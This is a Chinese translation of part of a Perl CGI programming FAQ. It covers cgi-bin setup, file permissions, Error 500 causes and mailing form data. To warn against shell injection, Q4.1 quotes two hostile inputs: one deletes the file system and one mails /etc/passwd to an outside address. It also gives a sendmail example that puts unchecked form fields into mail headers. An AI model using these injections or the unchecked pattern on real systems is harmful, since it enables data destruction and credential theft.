中文版 Perl CGI 程式写作常问问题集(四)

答案：3.0 - CGI 与 WWW Server 

--------------------------------------------------------------------------- 

Q3.1: 我的 Perl CGI 程式要放在哪里执行？cgi-bin 这个目录是做甚麽用的？ 

server 通常是设定成去执行放在 ``cgi-bin'' 目录底下的 CGI 程式。不过， 
server 管理者同时也可以在设定档中设定 aliases，让所有含某些副档名（如 
..cgi 
、.pl）的 scripts 都能执行*。 

【译者】设定 CGI aliases 和副档名固然很方便，但 server 管理者须注 
意到相关的安全问题。 

--------------------------------------------------------------------------- 

Q3.2: 什麽是档案使用权限？怎样改？ 

档案权限是根据使用者识别代号（又称 
uid），以及他们所属的团体来决定是否赋与 
使用者读、写，和执行某档案的权利。您可使用 chmod 
这个指令去修改档案的使用 
权限。例如： 

% ls -ls form.cgi 
1 -rwx------ 1 shishir 974 Oct 31 22:15 form.cgi* 

此一档案的权限为 
0700（八进制），意味著没有人（档案所有人除外）能够读取、 
写进，或执行这个档案。我们可以用 chmod 这个指令去修改它的权限： 

% chmod 755 form.cgi 
% ls -ls form.cgi 
1 -rwxr-xr-x 1 shishir 974 Oct 31 22:15 form.cgi* 

这样一来，权限就变了。现在和 ``shishir'' 
在同一个团体的使用者，还有其他任 
何的使用者都有权利去读取和执行这个档案了。 

如欲知 chmod 指令各八进制数码所代表的含意，请参阅 chmod 
manpages的说明。 

--------------------------------------------------------------------------- 

Q3.3: Perl 应该安装在哪里才可以执行它？ 

Perl 可以安装在系统上任何一个角落！您唯一要注意的是 server 
不能在chroot 的 
环境下跑，否则它便无法跑 perl 
解译器。换言之，系统管理者可以把根目录改变， 
让 ``/'' 指到另一个目录，而不是实际真正的根目录(``/'')。 

--------------------------------------------------------------------------- 

Q3.4: 我为什麽一直得到 ``Server: Error 500'' 的讯息？ 

以下几种情形会触发这个错误讯息： 

* 如果 script 开头的地方没有 ``#!/usr/local/bin/perl'' 这个指到 
Perl 解 
译器的标头，或者是指到解译器（或 library 档）的路径错误。 
* 如果 script 输出的第一行是一个不正确的标头（即 ``Content-Type: 
text/html'' ），或者是该标头後面没有跟著一个空行。 
* 如果您的 script 有句法上的错误。您的 scripts 
都应在指令列先跑跑看才 
是。 

--------------------------------------------------------------------------- 

Q3.5: 我试著打开一个档案，想把资料储存在里头，但是 open() 
的指令失败了。到 
底是怎麽搞的？ 

一般说来，HTTP server 是以 
``nobody''、``www''，或其他这类权限低的使用者的 
身份来跑的。因为这个缘故，您打算在其中制造新档案的目录，对 server 
跑的使用 
者 ID 必须要是可写(writable)才行。 

为了确定起见，您每次都应该先检查 open 这个指令送回的结束状态(return 
status 
)，看看 open 有没有成功。 

open(FILE, "/abc/data.txt") 
|| error("Could not open file /abc/data.txt"); 
. 
. 
. 
sub error { 
my($message) = @_; 

print <<End_of_Error; 
Content-type: text/html 
Status: 500 CGI Error 
<HTML> 
<HEAD><TITLE>CGI Error</TITLE></HEAD> 
<BODY> 
<H1>Oops! Error</H1> 
<HR> 
$message 
<HR> 
</BODY> 
</HTML> 
End_of_Error 
} 



4.0 －程式设计疑难杂症 

--------------------------------------------------------------------------- 

Q4.1: 我想让 user 填的 form 资料自动寄给我，该怎麽做？有没有范例？ 

其实做这个很容易。您的 CGI script 必须能做到这两件事： 

1. 将 form 中的资料整理出来。别忘了，所有的 form 资料都会被 
URL-编码起来 
（先不考虑 Netscape 2.0 【及 2.0 以上所支援】的 multipart 
MIME资料）。 
2. 开一个管路 (pipe) 到 mail （或 sendmail ），然後把 form 
资料写过去。 

我们就假设您用的是 CGI::* 模组。您可用以下的方法去叫 sendmail： 

$cgi_form = new CGI::Form; 
$from = $cgi_form->param('from'); 
$name = $cgi_form->param('name'); 
$to = $cgi_form->param('to'); 
$subject = $cgi_form->param('subject'); 
$message = $cgi_form->param('message'); 
open SENDMAIL, "| /usr/bin/sendmail -t -n"; 
print SENDMAIL <<End_of_Mail; 
From: $from <$name> 
To: $to 
Reply-To: $from 
Subject: $subject 
$message 
End_of_Mail 

有一个该注意的地方是 ``Reply-To:'' 的信头。由於 server 是以 
``nobody'' 

这个使用者的身份来跑，信头的地方可能会被搞坏（尤其是当有人想回这封信 
的时後）。加上 ``Reply-To'' 的信头这个问题便解决了。 

网路上有许多的 mail 渠道 (gateway)* 是以底下这种方法来送 mail： 

【译者】gateway 在此指送 email 的 CGI 程式 

open MAIL, "| mail -s 'Subject' $to"; 
^ 
| 
+-- 
可能会出问题的漏洞！！！ 

如果您没有先检查看 $to 这个变数有没有内含 shell 的特殊符号 
(metacharacters)，您是在自讨苦吃！譬如，如果哪个恶劣的 user 
输入了以下 
的资料： 

; rm -fr / ; 

那麽您的麻烦可大了*。 

【译者】这里头的 ``;'' 便是一个危险的 shell metacharacter。 
另一个危险的符号是 ``&''。 

在这个假想的情况中，有多少个档案会被远方的 user 给杀掉，还得 
视 server 跑的使用者的权限而定（这就是为什麽 server 要以低权 
限使用者身份跑的原因）。至少那些由 CGI 程式制造出来，但又没 
有备份的档案，是真的要跟它们永别了。 

; mail joe@crackerland.org </etc/passwd 

那您的 CGI script 就替您把 /etc/passwd 给拱手送上了。这对一 
个「未加工」的 Linux、SunOS 4.1，还有其他任何没安装 
shadow-password 的 UNIX 系统来说，实在不太好玩。如果 server 
错误地跑了 root，那麽就算装了 shadow-password 也没有用，因为 
远方的 cracker 甚至可以让这个 CGI 的 email script 给他送 
/etc/shadow （视系统而定，不一定在 /etc 底下或叫这个名字）。 


---------------------------------------------------------------------- 

Q4.2: 刚才这个用 form 送信的 script 看起来有点难。为什麽不乾脆用 
``mailto:URL''，这样 user 填入的资料就可以寄给我了？ 

很不幸地，mailto: 
的指令并不是所有的浏览器都支援。如果您在档案中用了它 
的话，会限制了那些使用没有支援 mailto:的浏览器的人，让他们无法送 
mail 给您*。 

【译者】尽管如此，您或许不会在乎那占极少数比例的使用者 
（Netscape 、 IE，和 lynx 等浏览器都支援 mailto:）。 


---------------------------------------------------------------------- 

Q4.3: 我要如何在 UNIX 以外的平台上做 Perl-CGI，譬如 Mac、MS-DOS、 
Windows 及 NT？我的 Perl CGI 
程式能不能在这些平台之间互相移植呢？能不 
能很直接，没有麻烦？我在 UNIX 主机上有帐号，但是都是先在 
Windows/Mac 
上做。我要如何在我自己的机器上测试写好的 CGI scripts*？ 

Perl 已经被移植到上述所有的平台上了。因此，您的 Perl CGI 
程式照理应不 
难移植。但如果您使用到一些 UNIX 
上的程式，那麽您的程式可能会不好移 

植。如果您只是做资料处理，或开启、读进档案等的话，那麽移植应该不会有 
问题。 

【译者】原 FAQ 并未回答最後这个问题。要在 Windows/OS2/Mac 等 
非 UNIX 平台上测式您的 scripts ，您可以使用 CGI.pm （支援以 
上所有平台），配合 Q4.19 中提示的除错技巧，或在自己的机器上 
安装 HTTP server 软体。如此就不用辛苦的连上主机去测式了。 


---------------------------------------------------------------------- 

Q4.4: 在 Perl CGI 程式中，STDERR （标准错误讯息)、STDIN 
(标准输入）， 
和 STDOUT （标准输出）各是连到何处？ 

在 CGI 环境下，STDERR 会指向 server 的错误讯息档 (error 
log)。您可以 
善加利用这个特性，把除错的讯息写到 
STDERR，然後您便可藉查看错误讯息档 
来帮您除错。 

STDIN 和 STDOUT 则都和浏览器相连。实际上，STDIN 连的是 server。 
server 
会先解读 client （或浏览器）送出的请求和资料，再将其送给 script。 

您也可以用将 STDERR 「复制」到 STDOUT 
的方法来抓错误讯息。这应该在 
script 靠前头的地方做（但应在您输出合适的 HTTP 标头之後）： 

open STDERR, ">&STDOUT"; 

这会将所有的错误讯息都转送到 STDOUT （即浏览器）去。 


---------------------------------------------------------------------- 

Q4.5: 如何写计数器

上一个：中文版 Perl CGI 程式写作常问问题集(三)
下一个：中文版 Perl CGI 程式写作常问问题集(五)